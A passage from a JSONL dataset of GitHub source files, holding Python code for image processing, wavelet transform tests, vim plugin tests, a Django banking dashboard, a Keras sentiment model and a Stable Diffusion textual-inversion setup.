np.ndarray, image2: np.ndarray) -> int:\r\n diff_image = ImageChops.difference(Image.fromarray(image1), Image.fromarray(image2))\r\n diff_array = np.array(diff_image).flatten().astype(\"uint32\")\r\n return (diff_array ** 3).sum()\r\n","repo_name":"gamecraftCZ/patriks_image_compression","sub_path":"src/image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"14849486517","text":"import os.path, fnmatch, struct, os\n\ndef summariseList(lst):\n \"\"\"\n Takes a sorted list of numbers, and returns a summary.\n Eg. [1, 2, 3, 4, 9] -> [(1, 4), 9]\n [1, 2, 3, 7, 8, 9] -> [(1, 3), (7, 9)]\n \"\"\"\n if len(lst) < 2:\n return lst\n ranges = []\n start = 0\n for i in range(1, len(lst)):\n if (lst[i] - lst[i-1]) > 1:\n if (i-1) == start:\n start = i\n ranges.append(lst[i-1])\n else:\n ranges.append((lst[start], lst[i-1]))\n start = i\n if lst[start] == lst[i]:\n ranges.append(lst[i])\n else:\n ranges.append((lst[start], lst[i]))\n return ranges\n\n\ndef isPathContained(outer, inner):\n \"\"\"\n Does inner lie \"within\" outer?\n Outer has to be an absolute path!\n \"\"\"\n inner = os.path.abspath(inner)\n outer = os.path.abspath(outer)\n if inner[:len(outer)] != outer:\n return False\n elif len(inner) == len(outer):\n return True\n elif inner[len(outer)] in [os.path.sep, os.path.altsep]:\n return True\n return False\n\n\ndef isPathContainedAny(outerList, inner):\n \"\"\"\n Like isPathContained, but with a list of outer directories.\n \"\"\"\n for i in outerList:\n if isPathContained(i, inner):\n return True\n return False\n\n\ndef isStringLike(anobj):\n try:\n # Avoid succeeding expensively if anobj is large.\n anobj[:0]+''\n except:\n return 0\n else:\n return 1\n\n\ndef isNumeric(obj):\n try:\n obj + 0\n except:\n return 0\n else:\n return 1\n\n\ndef _splitSpec(spec):\n \"\"\" \n Takes an input specification, and returns a (path, pattern) tuple.\n\n The splitting works as follows:\n - First, the spec is split on \".\".\n - We then try to maximally match as much as possible of the\n start of the spec to an existing file or directory.\n - The remainder is considered the mark pattern.\n\n If no path is found, the first element of the return tuple is the empty\n string.\n \"\"\"\n parts = spec.split(\".\")\n dirOffset = 0\n fileOffset = 0\n for i in range(1, len(parts) + 1):\n if os.path.isdir(\".\".join(parts[:i])):\n dirOffset = i\n elif os.path.isfile(\".\".join(parts[:i]) + \".py\"):\n fileOffset = i\n if dirOffset > fileOffset:\n target = \".\".join(parts[:dirOffset])\n pattern = \".\".join(parts[dirOffset:])\n elif fileOffset:\n target = \".\".join(parts[:fileOffset]) + \".py\"\n pattern = \".\".join(parts[fileOffset:])\n else:\n target = \"\"\n pattern = \".\".join(parts)\n if target and pattern == \"py\":\n pattern = \"\"\n return target, pattern\n\n\n\n# begin nocover\ndef terminalWidth():\n width = None\n try:\n import fcntl, termios\n cr = struct.unpack('hh', fcntl.ioctl(0, termios.TIOCGWINSZ, '1234'))\n width = int(cr[1])\n except (IOError, ImportError):\n pass\n return width or 80\n","repo_name":"samtaufa/pry","sub_path":"libpry/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38995900373","text":"from django.shortcuts import render\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets\nfrom .serializers import OperationSerializer, GlobalStatsSerializer\nfrom cotisation.models import Cotisation\nfrom parameter.models import Parameter\nfrom rest_framework import permissions\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.models import User\nfrom userCredit.models import UserCredit\nfrom credit.models import Credit\nfrom rest_framework.decorators import action\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response\n\n\nclass OperationPage(View):\n template_name = 'dashboard/operations/index.html'\n\n @method_decorator(login_required(login_url='/login'))\n def get(self, request):\n return render(request, self.template_name, {})\n\n\nclass OperationAPI(viewsets.ModelViewSet):\n\n http_method_names = ['get']\n serializer_class = OperationSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_queryset(self):\n\n queryset = Cotisation.objects.raw('SELECT auth_user.id , auth_user.first_name, auth_user.last_name , \\\n ifnull((SELECT SUM(cotisation_cotisation.amount) from cotisation_cotisation where cotisation_cotisation.user_id = auth_user.id),0 ) as sumAmount,\\\n ifnull( (select credit_credit.amount - SUM(userCredit_usercredit.amount) from userCredit_usercredit \\\n join credit_credit on credit_credit.id = userCredit_usercredit.credit_id \\\n where credit_credit.status = \"inprogress\" and credit_credit.user_id=auth_user.id group by userCredit_usercredit.credit_id \\\n ),0 )as creditLeft, \\\n (select userProfile_userprofile.amount from userProfile_userprofile where userProfile_userprofile.user_id = auth_user.id) as cotisation_amount, \\\n ( (select 1 + TIMESTAMPDIFF(MONTH,userProfile_userprofile.start_date,now()) from userProfile_userprofile where userProfile_userprofile.user_id = auth_user.id ) * ( select cotisation_amount) - (select sumAmount) ) as amountLeft \\\n FROM auth_user \\\n group by auth_user.id')\n return queryset\n\n @action(detail=False, url_path=\"get_global_stats\")\n def get_global_stats(self, request):\n\n userCount = User.objects.all().count()\n supposedGlobalSolde = Parameter.supposedAmount()*userCount\n\n globalStates = []\n\n globalSolde = Cotisation.objects.all().aggregate(sumAmount=Sum('amount'))['sumAmount']\n\n if globalSolde:\n globalSoldeLeft = supposedGlobalSolde - globalSolde\n\n globalCredit = Credit.objects.filter(status=\"inprogress\").aggregate(sumAmount=Sum('amount'))['sumAmount']\n globalCredit = globalCredit if globalCredit else 0.0\n\n globalCreditLeft = UserCredit.objects.filter(credit__status=\"inprogress\").aggregate(summs=Sum('amount'))['summs']\n\n if globalCreditLeft:\n globalCreditLeft = globalCredit - globalCreditLeft\n else:\n globalCreditLeft = 0\n\n globalStates.append({'title': 'Solde Globale', 'data': globalSolde})\n globalStates.append({'title': 'Montant Cotisation Restant', 'data': globalSoldeLeft})\n globalStates.append({'title': 'Montant total des credits', 'data': globalCredit})\n globalStates.append({'title': 'Montant credit restant', 'data': globalCreditLeft})\n globstatsSer = GlobalStatsSerializer(globalStates, many=True)\n\n return Response(globstatsSer.data)\n","repo_name":"foxmjay/may1st-bank","sub_path":"operation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33725176168","text":"\"\"\"Test the conv-fwt code.\"\"\"\n# Written by moritz ( @ wolter.tech ) in 2021\nimport numpy as np\nimport pytest\nimport pywt\nimport scipy.misc\nimport torch\n\nfrom src.ptwt._mackey_glass import MackeyGenerator\nfrom src.ptwt._util import _outer\nfrom src.ptwt.conv_transform import (\n _flatten_2d_coeff_lst,\n _translate_boundary_strings,\n wavedec,\n waverec,\n)\nfrom src.ptwt.conv_transform_2 import wavedec2, waverec2\nfrom src.ptwt.wavelets_learnable import SoftOrthogonalWavelet\n\n\n@pytest.mark.parametrize(\"wavelet_string\", [\"db1\", \"db2\", \"db3\", \"db4\", \"db5\", \"sym5\"])\n@pytest.mark.parametrize(\"level\", [1, 2, None])\n@pytest.mark.parametrize(\"length\", [64, 65])\n@pytest.mark.parametrize(\"batch_size\", [1, 3])\n@pytest.mark.parametrize(\"mode\", [\"reflect\", \"zero\", \"constant\", \"periodic\"])\n@pytest.mark.parametrize(\"dtype\", [torch.float32, torch.float64])\ndef test_conv_fwt(wavelet_string, level, mode, length, batch_size, dtype):\n \"\"\"Test multiple convolution fwt, for various levels and padding options.\"\"\"\n generator = MackeyGenerator(\n batch_size=batch_size, tmax=length, delta_t=1, device=\"cpu\"\n )\n\n mackey_data_1 = torch.squeeze(generator(), -1).type(dtype)\n wavelet = pywt.Wavelet(wavelet_string)\n ptcoeff = wavedec(mackey_data_1, wavelet, level=level, mode=mode)\n cptcoeff = torch.cat(ptcoeff, -1)\n py_list = []\n for b_el in range(batch_size):\n py_list.append(\n np.concatenate(\n pywt.wavedec(\n mackey_data_1[b_el, :].numpy(), wavelet, level=level, mode=mode\n ),\n -1,\n )\n )\n py_coeff = np.stack(py_list)\n assert np.allclose(\n cptcoeff.numpy(), py_coeff, atol=np.finfo(py_coeff.dtype).resolution\n )\n res = waverec(ptcoeff, wavelet)\n assert np.allclose(mackey_data_1.numpy(), res.numpy()[:, : mackey_data_1.shape[-1]])\n\n\ndef test_ripples_haar_lvl3():\n \"\"\"Compute example from page 7 of Ripples in Mathematics, Jensen, la Cour-Harbo.\"\"\"\n\n class _MyHaarFilterBank(object):\n @property\n def filter_bank(self):\n \"\"\"Unscaled Haar wavelet filters.\"\"\"\n return (\n [1 / 2, 1 / 2.0],\n [-1 / 2.0, 1 / 2.0],\n [1 / 2.0, 1 / 2.0],\n [1 / 2.0, -1 / 2.0],\n )\n\n data = torch.tensor([56.0, 40.0, 8.0, 24.0, 48.0, 48.0, 40.0, 16.0])\n wavelet = pywt.Wavelet(\"unscaled Haar Wavelet\", filter_bank=_MyHaarFilterBank())\n coeffs = wavedec(data, wavelet, level=3)\n assert torch.squeeze(coeffs[0]).numpy() == 35.0\n assert torch.squeeze(coeffs[1]).numpy() == -3.0\n assert (torch.squeeze(coeffs[2]).numpy() == [16.0, 10.0]).all()\n assert (torch.squeeze(coeffs[3]).numpy() == [8.0, -8.0, 0.0, 12.0]).all()\n\n\ndef test_orth_wavelet():\n \"\"\"Test an orthogonal wavelet fwt.\"\"\"\n generator = MackeyGenerator(batch_size=2, tmax=64, delta_t=1, device=\"cpu\")\n\n mackey_data_1 = torch.squeeze(generator())\n # orthogonal wavelet object test\n wavelet = pywt.Wavelet(\"db5\")\n orthwave = SoftOrthogonalWavelet(\n torch.tensor(wavelet.rec_lo),\n torch.tensor(wavelet.rec_hi),\n torch.tensor(wavelet.dec_lo),\n torch.tensor(wavelet.dec_hi),\n )\n res = waverec(wavedec(mackey_data_1, orthwave), orthwave)\n assert np.allclose(res.detach().numpy(), mackey_data_1.numpy())\n\n\ndef test_2d_haar_lvl1():\n \"\"\"Test a 2d-Haar wavelet conv-fwt.\"\"\"\n # ------------------------- 2d haar wavelet tests -----------------------\n face = np.transpose(\n scipy.misc.face()[128 : (512 + 128), 256 : (512 + 256)], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(\"haar\")\n # single level haar - 2d\n coeff2d_pywt = pywt.dwt2(face, wavelet, mode=\"zero\")\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=1, mode=\"constant\")\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt.numpy())\n rec = waverec2(coeff2d, wavelet).numpy().squeeze()\n assert np.allclose(rec, face)\n\n\ndef test_2d_db2_lvl1():\n \"\"\"Test a 2d-db2 wavelet conv-fwt.\"\"\"\n # single level db2 - 2d\n face = np.transpose(\n scipy.misc.face()[256 : (512 + 128), 256 : (512 + 128)], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(\"db2\")\n coeff2d_pywt = pywt.dwt2(face, wavelet, mode=\"reflect\")\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=1)\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt.numpy())\n # single level db2 - 2d inverse.\n rec = waverec2(coeff2d, wavelet)\n assert np.allclose(rec.numpy().squeeze(), face)\n\n\ndef test_2d_haar_multi():\n \"\"\"Test a 2d-db2 wavelet level 5 conv-fwt.\"\"\"\n # multi level haar - 2d\n face = np.transpose(\n scipy.misc.face()[256 : (512 + 128), 256 : (512 + 128)], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(\"haar\")\n coeff2d_pywt = pywt.wavedec2(face, wavelet, mode=\"reflect\", level=5)\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=5)\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt)\n # inverse multi level Harr - 2d\n rec = waverec2(coeff2d, wavelet).numpy().squeeze()\n assert np.allclose(rec, face)\n\n\ndef test_outer():\n \"\"\"Test the outer-product implementation.\"\"\"\n a = torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0])\n b = torch.tensor([6.0, 7.0, 8.0, 9.0, 10.0])\n res_t = _outer(a, b)\n res_np = np.outer(a.numpy(), b.numpy())\n assert np.allclose(res_t.numpy(), res_np)\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"wavelet_str\", [\"haar\", \"db2\", \"db3\", \"db4\", \"sym4\"])\n@pytest.mark.parametrize(\"level\", [1, 2, None])\n@pytest.mark.parametrize(\"size\", [(32, 32), (32, 64), (64, 32), (31, 31)])\n@pytest.mark.parametrize(\"mode\", [\"reflect\", \"zero\", \"constant\", \"periodic\"])\ndef test_2d_wavedec_rec(wavelet_str, level, size, mode):\n \"\"\"Ensure pywt.wavedec2 and ptwt.wavedec2 produce the same coefficients.\n\n Wavedec2 and waverec2 invert each other.\n \"\"\"\n face = np.transpose(\n scipy.misc.face()[256 : (512 + size[0]), 256 : (512 + size[1])], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(wavelet_str)\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, mode=mode, level=level)\n pywt_coeff2d = pywt.wavedec2(face, wavelet, mode=mode, level=level)\n for pos, coeffs in enumerate(pywt_coeff2d):\n if type(coeffs) is tuple:\n for tuple_pos, tuple_el in enumerate(coeffs):\n assert (\n tuple_el.shape == torch.squeeze(coeff2d[pos][tuple_pos], 1).shape\n ), \"pywt and ptwt should produce the same shapes.\"\n else:\n assert (\n coeffs.shape == torch.squeeze(coeff2d[pos], 1).shape\n ), \"pywt and ptwt should produce the same shapes.\"\n flat_coeff_list_pywt = np.concatenate(_flatten_2d_coeff_lst(pywt_coeff2d), -1)\n flat_coeff_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_coeff_list_pywt, flat_coeff_list_ptwt.numpy())\n rec = waverec2(coeff2d, wavelet)\n rec = rec.numpy().squeeze()\n assert np.allclose(face, rec[:, : face.shape[1], : face.shape[2]])\n\n\n@pytest.mark.parametrize(\"padding_str\", [\"invalid_padding_name\"])\ndef test_incorrect_padding(padding_str):\n \"\"\"Test expected errors for an invalid padding name.\"\"\"\n with pytest.raises(ValueError):\n _ = _translate_boundary_strings(padding_str)\n","repo_name":"raja21068/PyTorch-Wavelet-Toolbox","sub_path":"tests/test_convolution_fwt.py","file_name":"test_convolution_fwt.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"16366189380","text":"import os\nfrom os.path import dirname\n\nclass TestFileObjects(object):\n\n def test_runs_on_whole_file(self, vim, path):\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n vim.normal(\"/foo\")\n result = vim.command(\"Pytest file\")\n assert \"py.test ==> Running tests for entire file\" in result\n vim.normal(\"\")\n vim.raw_command(\"Pytest session\")\n vim.raw_command(\"wincmd p\")\n result = vim.get_buffer()\n assert \"1 failed, 1 passed\" in result\n\n def test_no_tests(self, vim, path):\n vim.raw_command(\"e %s\" % path('test_empty.py'))\n result = vim.command(\"Pytest file\")\n assert \"0 collected tests, no tests ran. See :Pytest session\" in result\n\n\nbase_vimrc = \"\"\"\nsyntax on \" always want syntax highlighting\nfiletype on \" enables filetype detection\nfiletype plugin on \" enables filetype specific plugins\nfiletype indent on \" respect filetype indentation\nset nocompatible\nset rtp+=%s /Users/alfredo/vim/pytest.vim\n\"\"\" % dirname(dirname(dirname(__file__)))\n\n\nclass TestErrorsCustomPytestExecPath(object):\n\n def test_report_uses_custom_executable(self, vim_customized, path, tmpfile):\n pytest_executable = '%s/bin/py.test' % os.getenv('VIRTUAL_ENV')\n custom_executable = '%s/bin/pytest4' % os.getenv('VIRTUAL_ENV')\n if not os.path.exists(custom_executable):\n os.symlink(pytest_executable, custom_executable)\n vimrc = tmpfile(contents=base_vimrc+'let g:pytest_executable = \"pytest4\"')\n vim = vim_customized(vimrc)\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n result = vim.command(\"Pytest file\")\n assert \"pytest4 ==> Running tests for entire file\" in result\n\n\nclass TestErrorsCustomPytestExecFile(object):\n\n def test_report_uses_custom_executable_path(self, vim_customized, path, tmpfile):\n pytest_executable = '%s/bin/py.test' % os.getenv('VIRTUAL_ENV')\n custom_executable = '%s/bin/pytest4' % os.getenv('VIRTUAL_ENV')\n if not os.path.exists(custom_executable):\n os.symlink(pytest_executable, custom_executable)\n vimrc = tmpfile(contents=base_vimrc+'let g:pytest_executable = \"%s\"' % custom_executable)\n vim = vim_customized(vimrc)\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n result = vim.command(\"Pytest file\")\n assert \"pytest4 ==> Running tests for entire file\" in result\n\n","repo_name":"alfredodeza/pytest.vim","sub_path":"tests/functional/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"3"} +{"seq_id":"30188305154","text":"from keras.preprocessing import sequence\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Masking\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM\nfrom keras.datasets import imdb\n\n(X_train, y_train), (X_test, y_test) = imdb.load_data(path=\"imdb.pkl\",\n nb_words=None,\n skip_top=0,\n maxlen=None,\n test_split=0.1)\nk = 0\nfor i in range(X_train.shape[0]):\n k = max(k, len(X_train[i]))\nfor i in range(X_test.shape[0]):\n k = max(k, len(X_test[i]))\n\nX_train = sequence.pad_sequences(X_train, k)\nX_test = sequence.pad_sequences(X_test, k)\n\nmax_features = max(numpy.max(X_train), numpy.max(X_test))\nmaxlen = k\nbatch_size = 32\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length=maxlen))\nmodel.add(LSTM(128))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics = ['accuracy'])\n\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1, show_accuracy= True)\n\n# result = model.predict_proba(X)\n","repo_name":"nikitarybkin/my_code","sub_path":"UserReviewAnalyzer.py","file_name":"UserReviewAnalyzer.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36539623801","text":"import cv2\nimport random\nimport numpy as np\n\n\ndef level_1(input_image):\n # Define the number of circles to draw and their properties\n num_circles = 3\n circle_radius = random.randint(10, 20)\n circle_thickness = -1\n\n # Draw the circles in random positions\n for i in range(num_circles):\n # Generate random coordinates for the center of the circle\n center_x = random.randint(circle_radius, input_image.shape[1] - circle_radius)\n center_y = random.randint(circle_radius, input_image.shape[0] - circle_radius)\n center = (center_x, center_y)\n\n circle_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n # Draw the circle\n cv2.circle(input_image, center, circle_radius, circle_color, circle_thickness)\n\n # Save the modified image as output\n cv2.imwrite(\"output_image_level1.jpg\", input_image)\n\n pass\n\ndef level_2(input_image):\n img = input_image.copy()\n img_canny = cv2.Canny(img, 150, 200)\n MAX_CHANGES = 5\n contours, _ = cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n for i in range(len(contours)):\n x, y, w, h = cv2.boundingRect(contours[i])\n area = w * h\n rand = np.random.randint(1, 100)\n if area >= 100 and area <= 1000 and rand % 3 == 0:\n new_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n input_image[y:y + h, x:x + w] = new_color\n MAX_CHANGES -= 1\n if MAX_CHANGES == 0:\n break\n\n cv2.imwrite('output_image_level2.jpg', input_image)\n pass\n\n\ndef level_3(input_image):\n img = input_image.copy()\n img_canny = cv2.Canny(img, 150, 200)\n MAX_CHANGES = 5\n contours = [(c, cv2.contourArea(c)) for c in cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)[0]]\n for contour in contours:\n area = contour[1]\n rand = np.random.randint(1, 100)\n if area >= 500 and area <= 3000 and rand % 3 == 0:\n new_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n cv2.fillPoly(input_image, [contour[0]], new_color)\n MAX_CHANGES -= 1\n if MAX_CHANGES == 0:\n break\n\n cv2.imwrite('output_image_level3.jpg', input_image)\n pass\n\ndef level_4(input_image):\n img = input_image.copy()\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_canny = cv2.Canny(img_gray, 150, 200)\n\n # Find contours\n contours, _ = cv2.findContours(img_canny, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find largest contour\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find bounding box of largest contour\n x, y, w, h = cv2.boundingRect(largest_contour)\n\n size = max(w, h)\n cx, cy = x + w // 2, y + h // 2\n x = cx - size // 2\n y = cy - size // 2\n w, h = size, size\n\n # Extract portion of image within bounding box\n img_roi = img[y:y + h, x:x + w]\n\n # Rotate the image portion by specified angle\n center = (w // 2, h // 2)\n rotation_matrix = cv2.getRotationMatrix2D(center, 90, 1)\n rotated_img = cv2.warpAffine(img_roi, rotation_matrix, (w, h))\n\n # Replace the rotated portion in original image\n img[y:y + h, x:x + w] = rotated_img\n\n # Save the output image\n cv2.imwrite('output_image_level4.jpg', img)\n\ndef level_5(input_image):\n img = cv2.imread('input_image.jpg')\n\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Apply Canny edge detection\n canny = cv2.Canny(gray, 100, 200)\n\n # Find contours\n contours, hierarchy = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find the largest contour\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find bounding box of largest contour\n x, y, w, h = cv2.boundingRect(largest_contour)\n\n # Create a mask with the same size as the image\n mask = np.zeros(img.shape[:2], dtype=np.uint8)\n\n # Draw the largest contour on the mask in white color\n cv2.drawContours(mask, [largest_contour], 0, 255, -1)\n\n # Invert the mask\n mask = cv2.bitwise_not(mask)\n\n # Set the pixels inside the contour to black color\n color = img[y, x-5]\n img[mask == 0] = (color)\n cv2.imwrite('output_image_level5.jpg', img)\n\ndef dif(img1, img2):\n diff = cv2.absdiff(img1, img2)\n\n # Convert the difference image to grayscale\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply thresholding to create a binary image\n _, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY)\n\n # Apply morphological operations to remove noise and fill in gaps\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n thresh = cv2.erode(thresh, kernel, iterations=1)\n thresh = cv2.dilate(thresh, kernel, iterations=1)\n\n # Find contours in the binary imageS\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the contours on the original image\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n cv2.rectangle(img1, (x - 5, y - 5), (x + w + 5, y + h + 5), (0, 0, 255), 2)\n\n diff = cv2.absdiff(img1, img2)\n\n # Convert the difference image to grayscale\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply thresholding to create a binary image\n _, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY)\n\n # Apply morphological operations to remove noise and fill in gaps\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n thresh = cv2.erode(thresh, kernel, iterations=1)\n thresh = cv2.dilate(thresh, kernel, iterations=1)\n\n # Find contours in the binary image\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the contours on the original image\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n cv2.rectangle(img1, (x - 5, y - 5), (x + w + 5, y + h + 5), (0, 0, 255), 2)\n\n cv2.imwrite('dif_level5.jpg', img1)\n\ndef main():\n input_image = cv2.imread(\"input_image.jpg\")\n output_image = cv2.imread(\"output_image_level5.jpg\")\n #level_1(input_image)\n #level_2(input_image)\n #level_3(input_image)\n #level_4(input_image)\n #level_5(input_image)\n dif(output_image, input_image)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Elyy27/Image_Processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72789150161","text":"# Darshil Patel\n# December 14, 2022\n# CS7180 Advanced Perception\n# This script contains code for adding a new style to a Stable Diffusion model\n# and visually evaluating training and results of image generation using \n# DAAMs (Diffusion Attentive Attribution Maps)\n\nimport argparse\nimport itertools\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch.utils.data import Dataset\n\nimport PIL\nfrom accelerate import Accelerator\nfrom accelerate.logging import get_logger\nfrom accelerate.utils import set_seed\nfrom diffusers import AutoencoderKL, DDPMScheduler, PNDMScheduler, StableDiffusionPipeline, UNet2DConditionModel\nfrom diffusers.optimization import get_scheduler\nfrom diffusers.pipelines.stable_diffusion import StableDiffusionSafetyChecker\nfrom PIL import Image\nfrom torchvision import transforms\nfrom tqdm.auto import tqdm\nfrom transformers import CLIPFeatureExtractor, CLIPTextModel, CLIPTokenizer\n\nimport daam\nfrom daam import trace\nfrom diffusers import StableDiffusionPipeline\nfrom matplotlib import pyplot as plt\nimport accelerate\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cuda.matmul.allow_tf32 = True\n\n\ndef image_grid(imgs, rows, cols):\n \"\"\"\n Plots images in a grid to display them side by side.\n :param imgs: images to put on gird\n :param rows: number of images per row\n :param rows: number of images per column\n :return: the image\n \"\"\"\n assert len(imgs) == rows * cols\n\n w, h = imgs[0].size\n grid = Image.new('RGB', size=(cols * w, rows * h))\n grid_w, grid_h = grid.size\n\n for i, img in enumerate(imgs):\n grid.paste(img, box=(i % cols * w, i // cols * h))\n return grid\n\n\n\"\"\"## Setup for adding a new concept\"\"\"\n\n# Path for our pre-trained stable diffusion model\npretrained_model_name_or_path = \"stabilityai/stable-diffsion-2\"\n\n# URLs for the images representing our new style \nurls = [\n \"https://www.alexgrey.com/art-images/Psychedelic-Healing---2020-Alex-Grey-smaller-watermarked.jpg\",\n \"https://www.alexgrey.com/art-images/Godself-2012-Alex-Grey-watermarked.jpeg\",\n \"https://www.alexgrey.com/art-images/Rainbow-Eye-Ripple-2019-Alex-Grey-Allyson-Grey-watermarked.jpeg\"]\n\n# Display the training images\nimport requests\nimport glob\nfrom io import BytesIO\n\n\ndef download_image(url):\n try:\n response = requests.get(url)\n except:\n return None\n return Image.open(BytesIO(response.content)).convert(\"RGB\")\n\n\nimages = list(filter(None, [download_image(url) for url in urls]))\nsave_path = \"./my_concept\"\nif not os.path.exists(save_path):\n os.mkdir(save_path)\n[image.save(f\"{save_path}/{i}.jpeg\") for i, image in enumerate(images)]\nimage_grid(images, 1, len(images))\n\n# Setup tokens and parameters for teaching the model\n# Here we set up the tokens that we use to train the concept in the model\nwhat_to_teach = \"style\"\nplaceholder_token = \"\"\ninitializer_token = \"ag\"\n\n# Training the model using the textual inversion method\n\n# Create Dataset\n\n# These prompts are sampled from Google ImageGen templates and are suitable to \n# help teach the new concept in the text embedding space\nimagenet_templates_small = [\n \"a photo of a {}\",\n \"a rendering of a {}\",\n \"a cropped photo of the {}\",\n \"the photo of a {}\",\n \"a photo of a clean {}\",\n \"a photo of a dirty {}\",\n \"a dark photo of the {}\",\n \"a photo of my {}\",\n \"a photo of the cool {}\",\n \"a close-up photo of a {}\",\n \"a bright photo of the {}\",\n \"a cropped photo of a {}\",\n \"a photo of the {}\",\n \"a good photo of the {}\",\n \"a photo of one {}\",\n \"a close-up photo of the {}\",\n \"a rendition of the {}\",\n \"a photo of the clean {}\",\n \"a rendition of a {}\",\n \"a photo of a nice {}\",\n \"a good photo of a {}\",\n \"a photo of the nice {}\",\n \"a photo of the small {}\",\n \"a photo of the weird {}\",\n \"a photo of the large {}\",\n \"a photo of a cool {}\",\n \"a photo of a small {}\",\n]\n\nimagenet_style_templates_small = [\n \"a painting in the style of {}\",\n \"a rendering in the style of {}\",\n \"a cropped painting in the style of {}\",\n \"the painting in the style of {}\",\n \"a clean painting in the style of {}\",\n \"a dirty painting in the style of {}\",\n \"a dark painting in the style of {}\",\n \"a picture in the style of {}\",\n \"a cool painting in the style of {}\",\n \"a close-up painting in the style of {}\",\n \"a bright painting in the style of {}\",\n \"a cropped painting in the style of {}\",\n \"a good painting in the style of {}\",\n \"a close-up painting in the style of {}\",\n \"a rendition in the style of {}\",\n \"a nice painting in the style of {}\",\n \"a small painting in the style of {}\",\n \"a weird painting in the style of {}\",\n \"a large painting in the style of {}\",\n]\n\n\n# Setup the dataset\nclass TextualInversionDataset(Dataset):\n def __init__(\n self,\n data_root,\n 